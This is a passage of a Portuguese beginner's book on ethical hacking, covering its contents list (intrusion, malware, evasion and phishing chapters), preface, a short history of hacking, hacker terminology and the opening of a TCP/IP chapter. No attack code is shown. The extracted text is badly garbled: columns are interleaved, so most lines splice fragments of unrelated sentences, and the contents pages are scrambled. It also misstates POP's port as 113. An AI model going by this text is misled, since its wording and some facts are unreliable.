Você está na página 1de 80

1 Segredos do Hacker tico 2.3.

2 2
PREFCIO.......................................................................... Comandos....................................................................................... 5
.........................................6 ...................................................... 24 VARREDURA......................................................................
1 ENTENDENDO O 2.4 Camada de Internet ..................................45
ASSUNTO......................................................................... ......................................................................................... 5.1 Descobrindo Computadores na
......8 .................................... 25 Rede.................................................................................
1.1 Bem-vindo ao Obscuro Mundo da Segurana 2.4.1 Protocolos ........ 45
Digital.......................................................... 8 .......................................................................................................... 5.2 Descobrindo Portas Abertas nos
1.2 Por que a Insegurana ................................... 26 Computadores.................................................................
Existe?............................................................................... 2.4.2 46
......................... 9 Comandos....................................................................................... 5.3 Softwares
1.3 Breve Histria do ...................................................... 27 .........................................................................................
Hacking............................................................................. 2.5 Tipos de Transmisso de .......................................................... 50
................................... 11 Dados............................................................................... 5.3.1
1.4 Que Termo Este? ..................... 31 Windows.........................................................................................
......................................................................................... 3 ORGANIZANDO O PENETRATION ....................................................... 50
....................................... 12 TEST.....................................................33 5.3.2
1.5 Diviso do Livro 4 Linux.................................................................................................
......................................................................................... FOOTPRINTING................................................................. ...................................................... 51
............................................. 14 .................................37 5.4 Soluo
2 TCP/IP 4.1 Pesquisa .........................................................................................
BSICO............................................................................. Manual.............................................................................. ............................................................... 51
.....................16 ....................................................... 37 6
2.1 4.2 Pesquisa ENUMERAO..................................................................
TCP/IP............................................................................... Automatizada.................................................................... ...................................52
........................................................................... 16 .................................................. 38 6.1 Descoberta do Sistema
2.2 Camada de 4.3 Google Operacional......................................................................
Aplicao.......................................................................... ......................................................................................... ..................... 52
................................................. 16 ................................................................. 38 6.1.1 Pesquisar Pginas no Indexadas
2.2.1 Protocolos 4.4 Softwares ............................................................................................... 52
.......................................................................................................... ......................................................................................... 6.1.2 Fingerprint
................................... 16 .......................................................... 43 ..........................................................................................................
2.2.2 4.4.1 .................................. 53
Comandos....................................................................................... Windows......................................................................................... 6.2 Enumerao dos
...................................................... 19 ....................................................... 43 Servios.............................................................................
2.3 Camada de 4.4.2 .................................... 54
Transporte......................................................................... Linux................................................................................................. 6.2.1 Leitura de
............................................... 22 ...................................................... 43 Banners............................................................................................
2.3.1 Protocolos 4.5 Soluo ................................ 54
.......................................................................................................... ......................................................................................... 6.3 Enumerao de
................................... 22 ............................................................... 44 Usurios............................................................................
www.baixebr.org ....................................... 55
6.3.1 Usurios pelo 7.7.1 Languard 8.2 Burlando o Firewall
SMTP................................................................................................ .......................................................................................................... .........................................................................................
........................... 55 ..................................... 76 ..................................... 98
6.3.2 Usurios por Sesso 7.7.2 Shadow Security 8.2.1 Servidores
Nula................................................................................................. Scanner........................................................................................... Proxy...............................................................................................
.............. 56 .................... 77 ................................. 99
6.4 Softwares 7.7.3 Syhunt 8.2.2 Spoofing
......................................................................................... TrustSight........................................................................................ ..........................................................................................................
.......................................................... 60 ...................................... 78 .................................... 102
6.4.1 7.7.4 8.2.3 IP Spoofing No-
Windows......................................................................................... Nessus.............................................................................................. cego.................................................................................................
....................................................... 60 ...................................................... 79 .................... 102
6.4.2 7.8 Softwares 8.2.4 IP Spoofing Cego
Linux................................................................................................. ......................................................................................... ..........................................................................................................
...................................................... 61 .......................................................... 88 ................... 104
6.5 Soluo 7.8.1 8.2.5
......................................................................................... Windows......................................................................................... Sterm...............................................................................................
............................................................... 61 ....................................................... 88 ..................................................... 104
7 FALHAS E 7.8.2 8.2.6
PROBLEMAS...................................................................... Linux................................................................................................. Netwox............................................................................................
..............62 ...................................................... 89 ..................................................... 106
7.1 Buffer 7.9 Soluo 8.2.7 Conexo Reversa
Overflow........................................................................... ......................................................................................... ..........................................................................................................
............................................................ 62 ............................................................... 89 ................... 107
7.2 Race Conditions 3 8.2.8 Tunneling
......................................................................................... 8 BURLANDO PROTEES ..........................................................................................................
............................................. 63 .................................................................................90 .................................. 113
7.3 SQL 8.1 Burlando o Antivrus 8.3 Burlando o
Injection............................................................................. ......................................................................................... IDS....................................................................................
............................................................... 63 ................................... 90 .................................................. 118
7.4 PHP 8.1.1 Alterao em 8.3.1 Combinando
Injection............................................................................. Hexadecimal.................................................................................. Mtodos..........................................................................................
.............................................................. 64 ........................... 90 ........................... 120
7.5 Cross Site Scripting 8.1.2 Apagando Recursos do Executvel 8.3.2 Codificao de
......................................................................................... ............................................................................................. 91 URL...................................................................................................
..................................... 66 8.1.3 Compresso de ....................... 121
7.6 Pesquisa Executveis..................................................................................... 8.3.3 Barras Duplas e Triplas
Manual.............................................................................. ..................... 94 ..........................................................................................................
....................................................... 67 8.1.4 Alternate Data ....... 121
7.7 Pesquisa Streams........................................................................................... 8.3.4 Travessia de
Automatizada.................................................................... ........................ 97 Diretrios........................................................................................
.................................................. 75 .......................... 121
8.3.5 Diretrios com Auto-referncia 9.4 Truques Aplicados na Informtica 10.2.1 Diferenas
.................................................................................................. ......................................................................................... ..........................................................................................................
122 ... 135 .............................. 145
8.4 Softwares 9.4.1 E-mail 10.2.2 Joiners
......................................................................................... Phishing........................................................................................... ..........................................................................................................
........................................................ 122 ...................................... 135 ..................................... 148
8.4.1 9.4.2 E-mail Falso 10.2.3 Identificando o Endereo IP do
Windows......................................................................................... .......................................................................................................... Alvo...................................................................................... 150
..................................................... 122 ............................. 139 10.2.4 Maneiras de se Iniciar um Trojan
8.4.2 9.4.3 Messengers ........................................................................................... 153
Linux................................................................................................. Instantneos.................................................................................... 10.2.5 Beast
.................................................... 123 ......................... 141 ..........................................................................................................
8.5 Soluo 9.5 Soluo ........................................ 157
......................................................................................... ......................................................................................... 10.3 Keyloggers
............................................................. 123 ............................................................. 142 .........................................................................................
9 ENGENHARIA 10 ................................................... 163
SOCIAL............................................................................. MALWARE......................................................................... 10.3.1 Keyloggers
.......125 ...............................143 Locais...............................................................................................
9.1 Manipulando os 10.1 ........................... 163
Sentimentos....................................................................... Backdoors......................................................................... 10.3.2 Keyloggers Remotos
................................. 126 ..................................................................... 143 ..........................................................................................................
9.1.1 Curiosidade 10.1.1 Backdoor .......... 165
.......................................................................................................... Simples............................................................................................ 10.4 Screenloggers
.............................. 126 .............................. 143 .........................................................................................
9.1.2 Confiana 10.1.2 Backdoor de Login ............................................ 165
.......................................................................................................... .......................................................................................................... 10.5
.................................. 127 .............. 143 Softwares..........................................................................
9.1.3 Simpatia 4 ..................................................................... 167
.......................................................................................................... 10.1.3 Backdoor de 10.5.1 Windows
.................................... 128 Telnet............................................................................................... ..........................................................................................................
9.1.4 Culpa ........................ 143 ................................. 167
.......................................................................................................... 10.1.4 Backdoor com Protocolos Incomuns 10.5.2
.......................................... 130 ...................................................................................... 144 Linux.................................................................................................
9.1.5 Medo 10.1.5 Backdoor de Servio .................................................. 167
.......................................................................................................... .......................................................................................................... 10.6
........................................... 131 .......... 144 Soluo.............................................................................
9.2 Como Lidar com Diferentes Pessoas 10.1.6 Rootkit ....................................................................... 167
........................................................................................ .......................................................................................................... 11 EXPLORANDO
133 ..................................... 144 FALHAS.............................................................................
9.3 Dicas de um Engenheiro Social Annimo 10.2 Cavalos de Tria ...169
.............................................................................. 135 .........................................................................................
....................................... 145
11.1 Explorando Injection 12.1.2 Senhas Padres 12.10.2
......................................................................................... .......................................................................................................... Linux.................................................................................................
............................. 169 ................... 195 ............................................... 227
11.1.1 12.2 Descobrindo 12.11
Introduo....................................................................................... Senhas............................................................................... Soluo.............................................................................
................................................. 169 ......................................... 203 .................................................................... 227
11.1.2 Obtendo Informaes de Mensagens de Erro 12.3 Fora-Bruta 13 DENIAL OF
.................................................................... 171 Remota.............................................................................. SERVICE............................................................................
11.1.3 Limites de .......................................... 204 ........228
Tamanho......................................................................................... 12.4 Fora-Bruta 13.1 DoS atravs de
............................ 173 Local................................................................................. Falhas...............................................................................
11.1.4 Outras Strings ............................................. 209 ..................................... 228
.......................................................................................................... 12.5 Rainbow Tables 13.2 Ataques
...................... 173 .......................................................................................................... Comuns..............................................................................
11.2 Explorando ........................ 212 .................................................. 229
XSS................................................................................... 12.6 13.3
............................................... 174 Sniffers.............................................................................. DDoS.................................................................................
11.3 Exploits ...................................................................... 213 ........................................................................ 230
......................................................................................... 12.7 Man in the 13.4
.......................................................... 176 Middle.............................................................................. Software...........................................................................
11.3.1 ................................................ 217 ...................................................................... 230
Payloads......................................................................................... 12.7.1 Man in the Middle Remoto 13.5
................................................... 176 ......................................................................................................... Soluo.............................................................................
11.3.2 Encontrando Exploits na 219 ....................................................................... 230
Web................................................................................................ 5 14
... 177 12.7.2 Man in the Middle Local SEGURANA.....................................................................
11.3.3 Executando os Exploits .......................................................................................................... ...............................232
.......................................................................................................... .... 222 14.1 Dicas
..... 179 12.8 Outras Tcnicas de Senhas Bsicas..............................................................................
11.3.4 ......................................................................................... ......................................................... 232
Multiexploitadores........................................................................ ................ 223 14.2 Firewall
................................................. 180 12.9 .........................................................................................
11.4 Netbios............................................................................. .......................................................... 232
Softwares.......................................................................... ....................................................................... 224 14.3
..................................................................... 192 12.10 IDS....................................................................................
12.1 Introduo s Senhas Softwares.......................................................................... ......................................................................... 236
......................................................................................... .................................................................. 226 14.4 Honeypots
........................... 194 12.10.1 .........................................................................................
12.1.1 Senhas Windows......................................................................................... .................................................... 238
Fceis............................................................................................... ................................................ 226 14.5 Monitoradores do
.................................. 194 Sistema.............................................................................
.............................. 241
14.5.1 Monitorador de Registro ataque. Isso no impede um usurio avanado de ler o comuns de formas incomuns. E geralmente esse o
.......................................................................................................... livro, s no espere conceito central: a
... 242 tcnicas avanadas que envolvam programao, como, criatividade. Isso o que separa um hacker de um
14.5.2 Monitorador de Arquivos por exemplo, profissional da mesma
.......................................................................................................... desenvolvimento de exploits. Para essas pessoas, existe o rea, seja ele qual for. Como se fossem dois mecnicos:
.. 243 livro Desafio um acredita que
14.6 Limpeza de Rastros Linux Hacker, tambm da Editora Visual Books. precisa trocar uma pea do carro, outro usa a cabea e
......................................................................................... Marcos Flvio Arajo Assuno pensa em uma
................................ 243 CEH (Certified Ethical Hacker) maneira alternativa para resolver o problema, usando os
14.7 Se desejar entrar em contato com o autor, recursos que j
Checksums......................................................................... voc pode faz-lo pelos emails: possui.
................................................................... 244 <mflavio2k@yahoo.com.br> Por essa caracterstica criativa, apio a traduo do
14.8 <mflavioaa@hotmail.com> termo hacker para
Softwares.......................................................................... <marcosflavioaraujo@gmail.com> fuador. Vamos abolir o esteretipo de criminoso
..................................................................... 245 <mflavio@maxxisolucoes.com.br> digital, j que ser
14.8.1 Windows Ou acesse os sites: curioso no necessariamente significa ser bandido.
.......................................................................................................... <www.defhack.com> Nenhum outro termo
................................. 245 <www.anti-trojans.cjb.net> traduz melhor algum que vai a fundo em alguma
14.8.2 <www.maxxisolucoes.com.br> questo, revirando-a at
Linux................................................................................................. <www.youtube.com/defhack> resolver o problema. Einstein foi um fuador. Newton foi
.................................................. 245 <www.via6.com/mflavio2k> um fuador
6 7 tambm. Foram pessoas que pensaram frente do seu
Prefcio O que define um hacker? A explicao mais convincente tempo.
um prazer lanar novamente um livro para os curiosos e que j ouvi At mesmo na fico, o clebre MacGyver, do seriado
novatos da : termo que significa diferentes coisas para diferentes Profisso: Perigo,
rea de segurana digital. Da primeira ltima pgina, pessoas. Grande traduz o fuador perfeito: com um isqueiro, uma
o material foi criado parte da mdia, por no conhecer a fundo a questo, mangueira e um pouco de
para se adaptar s novidades do mundo informatizado, chama os hackers de gasolina criava um lana-chamas. Bom, agora que tenho
mas, claro, meros criminosos digitais. Ou mesmo Cyberterroristas. certeza de que
mantendo o mesmo padro dos anteriores, com uma De outro lado, a maioria dos garotos mais novos que voc entendeu minha viso sobre esse termo, prezado
linguagem fcil de entra no mundo do leitor, vamos tentar
entender e muitas ilustraes. hacking v a palavra hacker como uma espcie de responder a algumas perguntas bem interessantes.
O objetivo do livro Segredos do Hacker tico no o de graduao: no Por que pessoas com um conhecimento extremamente
ser um possvel se tornar um a menos que se saibam todas as avanado em redes,
material avanado, com muitos detalhes e termos tcnicos linguagens, sistemas sistemas e softwares, como um PHD, mesmo tendo um nvel
que somente e mtodos de invaso conhecidos pelo homem, pensam. de
poucas pessoas da rea saberiam entender. A idia Mas, de acordo com a terminologia e a prpria idia conhecimento bem mais elevado que o dos hackers, no
introduzir as pessoas original, ambos esto conseguem
no mundo da segurana digital e dos hackers, fazendo errados. O termo hacker foi introduzido informtica realizar suas tcnicas mais avanadas? Por que uma
com que conheam aproximadamente na equipe com centenas
muitas das tcnicas utilizadas tanto para proteo de dcada de 1960, para designar pessoas que conseguiam de pesquisadores que desenvolvem uma soluo de
sistemas quanto para resolver problemas segurana no
consegue enxergar os mtodos que os fuadores vo becomes a cybercrime lab (Brasil torna-se um Esse conceito tem se tornado to importante que j existe
tentar utilizar para laboratrio do crime uma
burl-la? E a resposta simples. As pessoas que possuem ciberntico), na qual tambm fui citado na poca, Certificao Internacional para Hackers ticos, ensinando
apenas o mostrando que os a pessoas as
conhecimento puro, mas sem a criatividade nativa e invasores brasileiros so os que mais atacam no mundo. tcnicas do submundo digital, para que possam testar
aguada do fuar, Em 2004, a Polcia em seus prprios
no conseguem pensar fora da caixa. Federal publicou uma nota dizendo que de cada dez sistemas. A seguir, voc v uma imagem do site do CEH
Exemplos interessantes podem ser notados em tecnologias hackers em atividade (Certified Ethical
anticpias de no mundo, oito so brasileiros. 9
CDs de udio. Aps um investimento de centenas de Creio que no exista uma outra rea no campo da Hacker). interessante citar que vrias empresas grandes,
milhares de dlares computao/informtica to cheia de contradies e como Microsoft,
em um novo sistema seguro, descobriu-se que ele poderia polmicas, alm de um HP, Cisco e at o prprio governo americano, j
ser burlado certo mistrio. Todos os dias surgem novidades e voc certificaram profissionais.
apenas com a utilizao de uma fita adesiva colada nas precisa ficar atento Eu mesmo, sou um certificado CEH j a alguns anos.
bordas do disco. para estar sempre atualizado. Na poca em que este Recomendo a todos
Outro caso: conseguiram, atravs de um sistema complexo livro estava sendo que desejam se profissionalizar na rea de Hacking. A
de certificao, escrito, os ataques da moda eram baseados em Injection prova pode inclusive
8 e XSS (Cross Site ser realizada atravs da VUE (www.vue.com).
impedir que um programa copiasse as msicas do CD Scripting). O Orkut dominava as redes sociais no Brasil e O endereo do CEH :
para o disco. Soluo o GMAIL (do <http://www.eccouncil.org/CEH.htm>
simples: ligue a sada de som do microsystem, na entrada Google) ainda estava em sua eterna verso Beta. So O que voc precisa saber que, apesar de a Segurana
de udio do PC. interessantes essas Digital estar
Ento grave o udio puro, ao invs de copiar os arquivos. informaes para mostrar o quanto esses servios iro em constante e rpida evoluo, suas bases no mudam,
Novamente, evoluir rapidamente. apenas se
facilmente burlvel, utilizando-se a criatividade. Assim tambm a segurana digital. sofisticam. So essas bases que mostrarei no livro, as
Se os nossos programas de proteo se utilizassem de A maior polmica dessa rea entre os seus profissionais tcnicas de ataque e
toda a criatividade diz respeito defesa mais comuns nas quais todas as outras se baseiam.
de que os vrus atualmente se utilizam (como extrema necessidade ou no de se possuir conhecimentos de como Novamente, cito
dificuldade de se os invasores que meu objetivo no incentivar a invaso de sistemas,
localizar e fechar), no seriam muito mais eficientes e entram nos sistemas. Algumas pessoas, e eu me incluo pelo contrrio,
difceis de serem nelas, acreditam mostro as tcnicas mais comuns de ataque pretendendo
burlados? Esperemos que os profissionais que nos trazem que preciso saber onde est o buraco para que se ensinar as pessoas
segurana possa fech-lo. Para a se protegerem delas.
aprendam algo que todo fuador de computador sabe isso, utilizamos um recurso chamado de Penetration Test 1.2 Por que a Insegurana Existe?
desde a dcada de (Teste de 10
1960. Se no pensar fora da caixa, melhor nem pensar Intruso). um teste feito pelos profissionais em seus No slide anterior, voc pode ver que dividi a razo da
1 Entendendo o Assunto sistemas e redes, no insegurana em
1.1 Bem-vindo ao Obscuro Mundo da Segurana Digital qual eles tentam ganhar acesso indevido a esses recursos trs partes:
Em 27 de outubro de 2003, o reprter Tony Smith do The como um Falhas de Programas;
New York verdadeiro invasor faria. Assim, testam as possveis falhas M configurao;
Times fez uma reportagem sobre o hacking no Brasil, existentes. Cultura da informao.
denominada Brazil
Essa diviso baseada em minha opinio somada ao regras de controle de usurio mal definidas, IDSs e Podemos encaixar tambm, dentro deste tpico, a
tempo que j possuo Firewalls mal Engenharia Social,
na rea. Vamos ver cada uma delas com detalhes: configurados ( muito comum nas empresas o enfoque que explicarei mais tarde em detalhes. Os mtodos de
Falhas de programas: Um software, medida que vai proteo dessas fraude/roubo
sendo desenvolvido ferramentas no sentido de fora para dentro e esquecer o desenvolvem-se com tamanha velocidade que, na maioria
e se tornando mais complexo, tem grandes possibilidades contrrio) e, claro, dos casos, no
de ter uma falha. at senhas fracas. De nada adianta ter configurado d tempo de ensinar os usurios comuns a no cair nessas
Isso porque os programadores so seres humanos e corretamente todo o armadilhas.
cometem erros como sistema se sua senha pode ser facilmente descoberta por Voc vai perceber que o ser humano o elo mais fraco
qualquer pessoa. s vezes, grupos de programadores algum. da segurana.
trabalhando no Cultura da informao: A Internet trouxe a velocidade da 1.3 Breve Histria do Hacking
mesmo projeto tm prazos a cumprir e acabam no comunicao Os hackers so mais antigos do que voc imagina. Vou
realizando um teste de instantnea para a nossa vida. Sejam notcias, msicas, citar alguns
stress to rigoroso em cima do software ou simplesmente filmes... at acontecimentos interessantes para demonstrar que desde
deixam passar conversamos de uma forma que ningum achava que a dcada de 1960
um problema que no viram. Existem at casos em que a seria possvel a dez j existiam pessoas praticando a arte de fuar onde
companhia sabe anos atrs. Todos esses recursos tambm tm um lado no devia.
que o produto vai sair com problemas, mas isso faz parte ruim, j que hoje, Em novembro de 1961, desenvolvedores do MIT (Instituto
de sua estratgia quando uma falha em algum software anunciada, de
para lanar futuras atualizaes e cobrar por elas. E no muitas vezes sem Tecnologia de Massachussets) demonstravam o seu
pense que a notificar anteriormente a empresa que fez o programa sistema experimental
programao para a Web est livre disso. muito comum para que crie alguma compatvel com gerenciamento de tempo, o que permitia
programadores correo, muitas pessoas se juntam para criar ferramentas quatro usurios
em ASP/PHP cometerem erros graves em seus cripts, que explorem trabalhando em terminais rodar programas ao mesmo
possibilitando essa falha. Existe um perodo, ento, entre uma falha ser tempo.
Injection ou Cross site scripting. Enfim, independente dos descoberta e a Compartilhamento de tempo significa que usurios que
motivos ou sua correo ser lanada e, exatamente nesse tempo, estivessem
plataformas, falhas em softwares so um dos motivos mais muitos invasores trabalhando nos terminais poderiam interferir
comuns de podem agir livremente. O perodo pode variar de poucas intencionalmente nos
insegurana. horas a dias, e no programas de outros usurios. No final dos anos 60,
M configurao: Um sistema, composto de softwares e necessariamente um sistema vulnervel fica totalmente terminais conectados
hardwares exposto. s vezes por modem poderiam ser facilmente invadidos, j que, na
diversos, se no for extremamente bem configurado, dicas so dadas nos sites de segurana especializados, poca, ningum
pode ocasionar uma mostrando como se preocupava em colocar senhas.
11 desabilitar o servio vulnervel at que uma correo 12
falha de segurana. Permisses mal colocadas de saia. Agora, Mainframes e computadores ofereciam pouca proteo
usurios, grupos e imaginem aqueles administradores que no tm o costume contra
diretrios, arquivos de instalao padro de um servidor de atualizar o comportamento malicioso dos usurios internos. Em 1972,
qualquer (Web, seu sistema nem depois da correo estar disponvel. j existiam
por exemplo) deixados para trs possibilitando que um Esses sim so os mais pessoas criando programas que entravam em loop at
invasor os encontre, vulnerveis. travar o sistema e
portas dos fundos que forneciam acesso ao trabalho de precursor de diversas pragas de hoje, como MyDoom, entrou no computador de sua escola para mudar sua nota
outra pessoa. O Blaster e outros. chamado de
primeiro computador de desktop que chegou ao mercado, Invasores hostis j estavam na ativa na Internet no final hacker. Um fraudador que engana pessoas, enviando-lhes
em 1975, em da dcada um simples email
conjunto com os preos de modens que caiam de 1980. O astrnomo Clifford Stoll descobriu que e pedindo que acessem o seu site para capturar suas
rapidamente, ajudaram a estavam faltando 75 senhas de acesso
criar o palco do que seria, depois, uma epidemia de centavos na sua conta e na de outras pessoas e ajudou a ao banco tambm chamado de hacker pela mdia.
invases visando pegar cinco Vamos ver alguns
sistemas corporativos. hackers alemes que haviam invadido 450 computadores. outros termos menos conhecidos.
Encriptao era a soluo para proteger dados de olhos Outras caadas a Hacker White-hat: Seria o hacker do bem, chamado de
curiosos que invasores estavam comeando mas na poca j havia hacker chapu
bisbilhotavam as redes. Em 1976, o governo americano gente demais branco. aquela pessoa que se destaca nas empresas e
aprovou fazendo isso. instituies por
oficialmente o Data Encryption Standard (DES), que se Hoje, o hacking continua sendo um fenmeno crescente, ter um conhecimento mais elevado que seus colegas,
tornou largamente com cada devido ao
usado para criptografar informaes enviadas por meios vez mais pessoas entrando nesse submundo digital. E o autodidatismo e paixo pelo que faz. No chega a
eletrnicos. Nesse Brasil no fica invadir sistemas e
mesmo ano, trs pesquisadores - Ronald Rivest, Adi atrs dessa realidade. causar estragos, exceto ao realizar testes de intruso.
Shamir e Leonard 1.4 Que Termo Este? Resumindo: tem um
Adelman - desenvolveram uma verso prtica de Como so utilizados diversos tipos de termos no meio vasto conhecimento, mas no o usa de forma banal e
criptografia de chave underground, at irresponsvel.
pblica, que fez um estrondoso sucesso anos depois comum algum se confundir ao comear a pesquisar mais Hacker Black-hat: Hacker do mal ou chapu negro.
atravs do excelente sobre os Esse, sim, usa
programa PGP de Zimmerman, hoje utilizado no mundo invasores e sua cultura. Por uma questo de mera seus conhecimentos para roubar senhas, documentos,
todo em larga curiosidade, vou causar danos ou
escala. enumerar aqui alguns dos termos mais utilizados e suas mesmo realizar espionagem industrial. Geralmente tem
Mas a criptografia no acabaria com todos os devidas seus alvos bem
problemas. Em 1982, o explicaes. definidos e pode passar semanas antes de conseguir
primeiro vrus de computador comeou a infectar sistemas 13 acesso onde deseja, se
Apple II. Os IBC Hacker: O termo original, utilizado desde as dcadas de o sistema for bem protegido.
PCs tambm tinham vrus a partir de 1986, assim, 1970 e 1980, Cracker: O mesmo que Hacker Black-hat.
antivrus comerciais j servia para designar fuadores. Com o passar do Engenheiro Social: Utiliza-se de meios no-tcnicos para
estavam disponveis a partir de 1988. Nesse ano tempo, foi sendo obter
tambm, o filho do utilizado pela mdia para nomear invasores de sistemas. informaes privilegiadas. Geralmente, um mestre em
cientista chefe da NSA, a agncia de segurana norte- Isso se reforou enganar e iludir as
americana mais em 1995, com o filme Hacker e com o caso do mais pessoas. No prximo captulo, vamos falar sobre ele.
poderosa, usou as credenciais de seu pai para lanar um famoso invasor do Scammer: Termo relativamente novo, o scammer um
worm, o primeiro mundo, Kevin Mitnick, tido como hacker do mal na fraudador, que se
tipo de vrus que se propagava via rede. Na poca, poca. At hoje esse utiliza de algumas falhas de programas comuns, como o
causou grande prejuzo termo ainda utilizado de forma peculiar. Um garoto de Internet Explorer,
e dor de cabea para seu criador, Robert Morris Jr. Esse doze anos que e de um pouco de Engenharia Social para enviar usurios
vrus foi o leigos a sites
falsos, quase idnticos aos originais. Seu objetivo mesmo condenei a prtica da mdia de generalizar essa assuntos considerados importantes.
capturar as senhas de palavra? Primeiro, Ento, o contedo dos captulos tcnicos ficar assim:
acesso daquela pessoa ao banco ou qualquer outra porque fica mais fcil o entendimento para as pessoas 15
instituio e, assim, que esto pouco Assunto;
roubar dinheiro de sua vtima. familiarizadas com os outros termos. mais simples definir Descrio;
Script Kiddie: Denominao dada ao invasor que no tem assim: hacker Softwares (Windows e Linux);
um tico e no-tico, da mesma maneira que existem bons e Soluo.
conhecimento profundo nem alvos definidos. No tem maus policiais. Em softwares, sero apresentados programas da mesma
conhecimento de Pronto! categoria para
programao e utiliza as famosas receitas de bolo 1.5 Diviso do Livro Windows e Linux. Quando no for apresentado em
para fazer seus Como disse anteriormente, a inteno desse material no sistemas diferentes,
ataques. Para os kiddies, o que importa a quantidade trazer um significa que voc pode rodar o programa nos dois
de sites que contedo extremamente avanado e tcnico, e sim sistemas. Como fazer
invadem, no a qualidade. Assim, arranham milhares de apresentar diversas isso? Voc tem duas opes:
sites todos os tcnicas e solues de modo mais abrangente, para ser Utilizar um emulador de sistema, como o Wine
dias, pixando sua pgina principal e, algumas vezes, entendido pela (www.winehq.org),
realmente tendo maior quantidade de pessoas possvel. Pode ser que voc emulador de ambiente Windows para sistemas Linux, e o
acesso a arquivos importantes. Existem pginas na seja um usurio Cygwin
Internet com rankings experiente e, mesmo assim, no saiba parte da matria (www.cygwin.com), emulador de ambiente Linux para
dos grupos que tiram mais websites do ar. Para esses aqui tratada, afinal, Windows.
grupos, entre invadir o fato do livro ter uma linguagem pouco formal no o Utilizar uma mquina virtual. Assim, voc pode rodar
uma seo do sistema da Nasa (o que levaria semanas), torna defasado. outro sistema
por exemplo, ou As diferenas entre o meu antigo livro Guia do Hacker operacional sem precisar ficar trocando de um para
14 Brasileiro e esta nova outro. at
retirar do ar dez pginas de pequenos provedores, obra no so poucas. Vou enumerar algumas: interessante para testar recursos de rede quando se tem
preferem a segunda Primeiro: Agora so abordadas solues de proteo apenas uma
opo. para as tcnicas de mquina. Tente o Vmware (www.vmware.com) , o
Defacer: Script Kiddie que s se preocupa em substituir a invaso/roubo de dados. opensource Bochs
pgina principal Segundo: Existe uma nova seo inteiramente voltada (http://bochs.sourceforge.net) ou o Virtual PC
de algum website. para a segurana (www.microsoft.com)
Lamer: Script Kiddie com pouco conhecimento, mas que se em si, contendo como contedo Firewalls, IDSs, Honeypots 16
faz passar por e outros. 2 TCP/IP Bsico
um guru da tecnologia. Terceiro: Em todos os captulos tcnicos, agora sero Nesse captulo, irei demonstrar o bsico necessrio para
Acredito que deu para notar que existem muitos termos demonstrados links que seja fcil
diferentes no para programas em ambiente Windows e Linux, sem entender o resto do livro. Se voc no um iniciante,
meio. E olhe que no citei todos, ainda existem wannabes, exceo. pode pular o captulo.
gurus, backers, Quarto: Todas as tcnicas de invaso e roubo de dados Se for, sugiro que leia e se acostume com alguns dos
phreakers etc., mas so irrelevantes. Para facilitar na so mostradas com termos vistos aqui,
hora de citar um a finalidade de ensinar os leitores a realizar Penetration pois sero muito utilizados na seqncia do livro.
invasor no livro, usarei o termo hacker mesmo. Mas, por Test nos seus 2.1 TCP/IP
que, se eu sistemas; ento, em alguns captulos, teremos um passo-a- O conjunto de protocolos TCP/IP foi desenvolvido pela
passo de Defense Advanced
Research Projects Agency (DARPA). Ele foi criado para servidor POP ou IMAP. No geral, o SMTP utilizado para certos comandos. Por exemplo, quando voc entra com
fornecer enviar a uma URL no seu
comunicao atravs da DARPA. Posteriormente, o TCP/IP mensagem de um cliente para um servidor, necessitando, browser, este envia automaticamente um comando HTTP
foi includo no portanto, que (comando GET)
Berkeley Software Distribution da Unix. Os Estados Unidos voc especifique esse servidor ao configurar o seu ao servidor Web, dizendo a ele para transmitir a pgina
desenvolveram o programa de e-mail. Web requisitada.
TCP/IP porque desejavam uma rede que pudesse 2.2.1.2 POP O HTTP um protocolo chamado de sem estado, pois
sobreviver a qualquer Esse protocolo o responsvel pelo recebimento dos e- cada comando
guerra ou conflito. Seja qual for o meio (cabos, fibras mails. O IMAP executado independentemente, sem nenhum conhecimento
ticas, microondas, (Internet Message Access Protocol) tambm utilizado dos comandos
satlites), a meta que os pacotes cheguem sempre ao para isso, mas no que vieram antes dele. Por isso, difcil implementar sites
seu objetivo. to popular quanto o POP (Post Office Protocol). Ele Web que
Utilizando essa tecnologia, a Internet foi criada. geralmente se reajam de modo inteligente entrada de dados de um
O TCP/IP dividido em quatro camadas (no confundir localiza na porta 113. Existem duas verses do POP. A usurio. Esse
com as sete primeira, problema do HTTP est sendo melhorado pode diversas
camadas do modelo OSI), que so: chamada POP2, tornou-se um padro na dcada de novas tecnologias,
Aplicao 1980 e dependia do incluindo ActiveX, Flash, Java, Javascript e Cookies.
Transporte SMTP. A verso mais nova, POP3, pode ser usada com ou 2.2.1.5 SNMP
Internet sem SMTP. Abreviao de Simple Network Management Protocol, um
Rede 2.2.1.3 FTP conjunto de
2.2 Camada de Aplicao Protocolo que permite a transferncia de arquivos protocolos para manusear redes complexas. As primeiras
Contm os protocolos de alto nvel (HTTP, FTP, SMTP etc.). atravs da rede. verses do SNMP
Todas as Voc acessa um servidor FTP com seu nome de usurio e foram desenvolvidas na dcada de 1980. Ele funciona
operaes com esses protocolos e suas propriedades, senha, e coloca enviando mensagens,
sesses e controle de ou pega arquivos ali dentro. uma maneira fcil e chamadas Protocol Data Units (PDUs), para diferentes
dilogos so realizadas nessa camada. Aps o trmino, rpida de transferir partes de uma rede.
os dados dados, muito usada para colocar um site no ar Equipamentos com suporte a SNMP, chamados de
empacotados so enviados para a camada seguinte. A rapidamente. Existe agentes, gravam dados
seguir, alguns dos tambm o TFTP, que por UDP (visto em camada de sobre si mesmos na Base de Manejamento de Informaes
muitos servios utilizados nessa camada. transporte), mas (MIBs), e
2.2.1 Protocolos esse no possui autenticao nem confiabilidade, alm de retornam esses dados para o programa que requisitou o
2.2.1.1 SMTP ser visto por SNMP.
O Simple Mail Transfer Protocol o protocolo muitos como um risco de segurana. 18
responsvel por entregar 2.2.1.4 HTTP 2.2.1.6 DNS
mensagens de e-mail a um destinatrio. Toda vez que Abreviao de Hyper Text Transfer Protocol, o HTTP o Domain Name System um sistema usado na Internet
seus e-mails so protocolo usado para converter os
enviados, um servidor SMTP se encarrega de encaminh- pela World Wide Web, a rede mundial de websites da nomes de domnios em endereos numricos (IPs). Isso
los ao seu Internet. Ele quem porque mais fcil
destino. Essas mensagens vo ser recuperadas depois, define como as pginas so formatadas e transmitidas e lembrar de um nome do que um nmero. Cada vez que
atravs do que aes voc digita um
17 servidores Web e navegadores (browsers) devem tomar nome de domnio (www.exemplo.com.br), um servio DNS
ao responder a deve traduzir o
nome para o seu endereo IP correspondente. como se o transmitir documentos privados pela Internet. Ele trabalha [computador]
sistema de DNS enviando uma O servidor FTP solicitar um usurio e a senha
tivesse a sua prpria rede. Se um servidor no consegue chave privada para criptografar os dados que sero correspondente.
